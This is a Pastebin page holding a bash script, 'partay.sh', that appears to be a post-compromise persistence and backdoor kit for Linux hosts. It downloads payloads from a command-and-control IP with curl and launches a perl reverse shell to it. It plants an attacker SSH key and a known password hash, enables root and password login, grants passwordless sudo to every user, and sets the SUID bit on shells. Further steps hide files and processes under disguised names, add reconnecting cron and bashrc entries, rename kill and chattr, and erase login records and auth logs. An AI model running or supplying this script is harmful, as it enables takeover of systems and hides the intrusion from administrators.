API tools faq
paste
Advertisement
squelch

partay.sh.txt

squelch
Mar 26th, 2017
98
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.30 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env bash
  2. set +x
  3.  
  4. # ===== DEFINITIONS ======
  5. C2_IP=172.31.35.44
  6. C2_PORT=5555
  7. #C2_IP=52.43.3.214
  8. SHARED_PUBKEY="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCutP0PLd7ktP96z2OPTCjvLSq1XxaxndU8Gi83vKdjtKtJh3GuDXulFRZYHBogO+zoolte59lzWMu0qFkLq1TVGRoYohfmCsguQI6kcXBfjkO43ZOydbLEn2AhrouOZ1BjIJIwRqDVAeoDe2nX+0Jhq1kvKzYsh2WJANHuBWEKzopsaryWYnXu9ESyYXylFioQbyoeLT9gdZ2e7N9dx+d0ntsQN9zjBVUh/5CrZkwM91tiM24D5NZ+/2jT2ypXiVFNSV1hxKZLQJgHqbUh0qvwXh3gcSLkjoZltIxxMi0Ylz5dfpI54ZJviczeyeiDa9qe5dW6C0KOKEtX+g87mg9b"
  9. SHARED_PASSWD="theallegedparadigm"
  10. DOWNLOAD_DIR="/etc/udev/conf.d/ "
  11. DECOY_NAME="[kworker/2:0]"
  12. # ========================
  13.  
  14. clear_logins() {
  15. cat /dev/null > /var/log/wtmp*
  16. cat /dev/null > /var/log/btmp*
  17. }
  18.  
  19. my_chattr() {
  20. if [ -f $(which chattr) ]; then
  21. echo $(which chattr)
  22. else
  23. echo /usr/bin/diff2
  24. fi
  25. }
  26.  
  27. install_ssh_key() {
  28.  
  29. if [ ! -d "/root/.ssh" ]; then
  30. mkdir /root/.ssh
  31. fi
  32.  
  33. if [ ! -d "/home/sys" ]; then
  34. mkdir /home/sys
  35. fi
  36.  
  37. declare -a files=("/root/.ssh/authorized_keys" "/root/.ssh/authorized_keys1" "/etc/ssh/authorized_keys" "/dev/.ssh/authorized_keys")
  38.  
  39. for i in "${files[@]}";
  40. do
  41. xchattr=$(my_chattr)
  42. $xchattr -i $i
  43. echo $SHARED_PUBKEY >> $i
  44. reset_mtime $i
  45. $xchattr +i $i
  46. done
  47. $xchattr -i /etc/ssh/sshd_config
  48. echo 'AuthorizedKeysFile /etc/ssh/authorized_keys %h/.ssh/authorized_keys' >> /etc/ssh/sshd_config
  49. $xchattr +i /etc/ssh/sshd_config
  50. }
  51.  
  52. permit_root_login() {
  53. xchattr=$(my_chattr)
  54. $xchattr -i /etc/ssh/sshd_config
  55. sed -i 's/^PermitRootLogin .*$/PermitRootLogin yes/' /etc/ssh/sshd_config
  56. sed -i 's/^PasswordAuthentication .*$/PasswordAuthentication yes/' /etc/ssh/sshd_config
  57. reset_mtime "/etc/ssh/sshd_config"
  58. service sshd reload
  59. $xchattr +i /etc/ssh/sshd_config
  60. }
  61.  
  62. reset_mtime() { # takes a file name
  63. touch -r /etc/issue $1
  64. }
  65.  
  66. get() { # takes a file name
  67. curl http://$C2_IP/$1 -s --create-dirs -o "/etc/udev/conf.d/ /$1"
  68. reset_mtime "/etc/udev/conf.d/ /$1"
  69. }
  70.  
  71. enable_sys_user() {
  72. #pass=lol123
  73. xchattr=$(my_chattr)
  74. $xchattr -i /etc/passwd
  75. $xchattr -i /etc/shadow
  76. sed -i -e 's/sys:\*:/sys:$6$OkgT6DOT$0fswsID8AwsBF35QHXQVmDLzYGT.pUtizYw2G9ZCe.o5pPk6HfdDazwdqFIE40muVqJ832z.p.6dATUDytSdV0:/g' /etc/shadow
  77. usermod -s /bin/sh sys
  78. usermod -s /bin/sh sys
  79. $xchattr +i /etc/passwd
  80. $xchattr +i /etc/shadow
  81. mkdir -p /dev/.ssh/
  82. }
  83.  
  84. immutable_users() {
  85. xchattr=$(my_chattr)
  86. $xchattr +i /etc/passwd
  87. $xchattr +i /etc/shadow
  88. }
  89.  
  90. drop_trixdoor() {
  91. # run server. Change binary name although won't help much
  92. # setsid ./trixd00rd -i eth0 -s 1 -b 5555 -c 172.31.35.44 -d -x
  93. get "trixd00rd"
  94. binname="[kworker]"
  95. mv '/etc/udev/conf.d/ /trixd00rd' "/etc/udev/conf.d/ /$binname"
  96. chmod +x "/etc/udev/conf.d/ /$binname"
  97. pushd '/etc/udev/conf.d/ '
  98. setsid ./$binname -i eth0 -s 1 -b 5555 $C2_IP -d -x
  99. popd
  100. # client command => ./trixd00r -h 172.31.8.127 -s 1 -p 5555
  101. }
  102.  
  103. drop_rooty() {
  104. # run server. Change name of binary, ex [kauditd]
  105. get "rooty-release"
  106. binname="[bioset]"
  107. mv '/etc/udev/conf.d/ /rooty-release' "/etc/udev/conf.d/ /$binname"
  108. chmod +x "/etc/udev/conf.d/ /$binname"
  109. pushd '/etc/udev/conf.d/ '
  110. setsid "./$binname"
  111. popd
  112. # setsid ./rooty-release
  113. # client command => python client.py -i eth0 -d 172.31.8.127
  114. }
  115.  
  116. everybody_gets_root() {
  117. echo 'ALL ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers
  118. xchattr=$(my_chattr)
  119. $xchattr -i /etc/passwd
  120. $xchattr -i /etc/shadow
  121. touch -r /etc/issue * /etc/passwd
  122. touch -r /etc/issue * /etc/sudoers
  123. groupadd admin
  124.  
  125. for user in $(awk -F':' '{ print $1 }' /etc/passwd); do
  126. usermod -G admin -a $user
  127. done
  128. $xchattr +i /etc/passwd
  129. $xchattr +i /etc/shadow
  130. }
  131.  
  132. my_root_shell() {
  133. cp /bin/sh '/etc/udev/conf.d/ /st'
  134. chmod u+s '/etc/udev/conf.d/ /st'
  135. }
  136.  
  137. suid_all_the_things() {
  138. declare -a files=("/bin/sh /bin/bash /bin/zsh $(which vim) $(which nano) $(which find)")
  139.  
  140. for i in "${files[@]}"
  141. do
  142. chmod u+s $i
  143. done
  144. }
  145.  
  146. obvious_revshell() {
  147. get "perl-revshell.pl"
  148. mv '/etc/udev/conf.d/ /perl-revshell.pl' '/etc/udev/conf.d/ /default'
  149. chmod u+s '/etc/udev/conf.d/ /default'
  150. chmod +x '/etc/udev/conf.d/ /default'
  151. pushd '/etc/udev/conf.d/ '
  152. setsid ./default $C2_IP 5555
  153. popd
  154. }
  155.  
  156. setup() {
  157. if [ ! -d '/etc/udev/conf.d/ /' ]; then
  158. mkdir -p '/etc/udev/conf.d/ '
  159. fi
  160. }
  161.  
  162. clean_logs() {
  163. sed -ie '/groupadd/d' /var/log/auth.log /var/log/messages /var/log/secure
  164. sed -ie '/usermod/d' /var/log/auth.log /var/log/messages /var/log/secure
  165. sed -ie "/$C2_IP/d" /var/log/auth.log /var/log/messages /var/log/secure
  166. sed -ie '/passwd/d' /var/log/auth.log /var/log/messages /var/log/secure
  167. sed -ie '/Accepted password for sys/d' /var/log/auth.log /var/log/messages /var/log/secure
  168. sed -ie '/Accepted password for root/d' /var/log/auth.log /var/log/messages /var/log/secure
  169. }
  170.  
  171. nochatrr() {
  172. if [ -d $(which chattr) ]; then
  173. mv $(which chattr) /usr/bin/diff2
  174. fi
  175. }
  176.  
  177. nokill() {
  178. if [ -d $(which kill) ]; then
  179. mv $(which kill) /bin/bzgrep2
  180. fi
  181. }
  182.  
  183. so_much_cron() {
  184. for user in $(awk -F: '$3 > 500 {print $1}' /etc/passwd); do
  185. (crontab -l -u $user 2>/dev/null; echo "*/1 * * * * '/etc/udev/conf.d/ /default' $C2_IP $C2_PORT") | crontab -u $user -
  186. done
  187. (crontab -l -u $user 2>/dev/null; echo "*/1 * * * * '/etc/udev/conf.d/ /default' $C2_IP $C2_PORT") | crontab -u root -
  188. (crontab -l -u $user 2>/dev/null; echo "*/1 * * * * '/etc/udev/conf.d/ /default' $C2_IP $C2_PORT") | crontab -u sys -
  189. }
  190.  
  191. bashrc() {
  192. for user in $(awk -F: '$3 > 500 {print $1}' /etc/passwd); do
  193. home=$(grep $user /etc/passwd|cut -f6 -d":")
  194. echo "'/etc/udev/conf.d/ /default' $C2_IP $C2_PORT" >> $home/.bashrc
  195. done
  196.  
  197. echo "'/etc/udev/conf.d/ /default' $C2_IP $C2_PORT" >> /root/.bashrc
  198. echo "'/etc/udev/conf.d/ /default' $C2_IP $C2_PORT" >> /dev/.bashrc
  199. echo "'/etc/udev/conf.d/ /default' $C2_IP $C2_PORT" >> /etc/profile
  200. echo "'/etc/udev/conf.d/ /default' $C2_IP $C2_PORT" >> /etc/bash.bashrc
  201. }
  202.  
  203. # Backdoor a binary (e.g bash)
  204.  
  205. partay() {
  206. setup
  207. suid_all_the_things
  208. everybody_gets_root
  209. my_root_shell
  210. enable_sys_user
  211. install_ssh_key
  212. permit_root_login
  213. obvious_revshell
  214. nokill
  215. immutable_users
  216. so_much_cron
  217. bashrc
  218. #drop_rooty
  219. #drop_trixdoor
  220. clear_logins
  221. clean_logs
  222. }
  223.  
  224. partay
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!